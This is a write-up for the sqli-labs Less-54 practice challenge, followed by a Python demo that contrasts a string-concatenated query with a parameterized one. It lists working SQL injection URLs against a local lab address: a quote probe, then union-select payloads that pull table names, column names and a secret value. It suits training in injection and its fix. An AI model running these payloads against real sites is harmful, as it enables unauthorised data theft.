Only 10 attempts are allowed.
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'
A single quotation mark causes an error, but no error message is displayed.
After adding a comment character the page returns to normal, so the parameter is closed by a single quote.
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'%23
From the page output we can tell that the queried table has at least the three fields id, username and password, so the union select should select at least 3 fields.
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,user(),database()%23
Concatenate all table names with the group_concat function.
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
There is only one table; check its column names.
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='13klht1vhr'%23
Querying data
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,secret_r03r,tryy from 13KLHT1VHR limit 0,1%23
Submit
Success
"Sqli-labs" Less54 GET - Challenge - Union - 10 queries allowed - Variation 1 (GET challenge, union query, only 10 queries allowed, variation 1)
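
Why the single-quote closure found above matters, and what removes it: the sketch below is an added example, not code from sqli-labs or from the original write-up. It assumes the lab pastes the id parameter between single quotes, uses an in-memory SQLite database as a stand-in for MySQL, and the table challenge_tbl, the column secret_key and all row values are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in data (SQLite instead of the lab's MySQL).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb');
        CREATE TABLE challenge_tbl (id INTEGER, secret_key TEXT, tryy INTEGER);
        INSERT INTO challenge_tbl VALUES (1, 'CONSTRUCTED-SECRET', 0);
    """)
    return db

def lookup_vulnerable(db, user_id):
    # Assumed shape of the flawed query: input concatenated inside '...'.
    sql = ("SELECT id, username, password FROM users WHERE id='"
           + user_id + "' LIMIT 1")
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # Hardened form: the value is bound, never parsed as SQL text.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return db.execute(sql, (user_id,)).fetchall()

def run(lookup, user_id):
    # Return the rows, or the string "sql-error" when the statement breaks.
    db = make_db()
    try:
        return lookup(db, user_id)
    except sqlite3.OperationalError:
        return "sql-error"

# The three kinds of input from the write-up: normal id, quote probe,
# and a union select against the second table ("-- " is SQLite's comment).
NORMAL = "1"
QUOTE_PROBE = "1'"
UNION_INPUT = "0' UNION SELECT 1, secret_key, tryy FROM challenge_tbl -- "

if __name__ == "__main__":
    for value in (NORMAL, QUOTE_PROBE, UNION_INPUT):
        print(repr(value))
        print("  concatenated :", run(lookup_vulnerable, value))
        print("  parameterized:", run(lookup_parameterized, value))
```

With the bound parameter the quote probe and the union input are compared to the id column as plain values, so both return no rows instead of breaking or extending the statement.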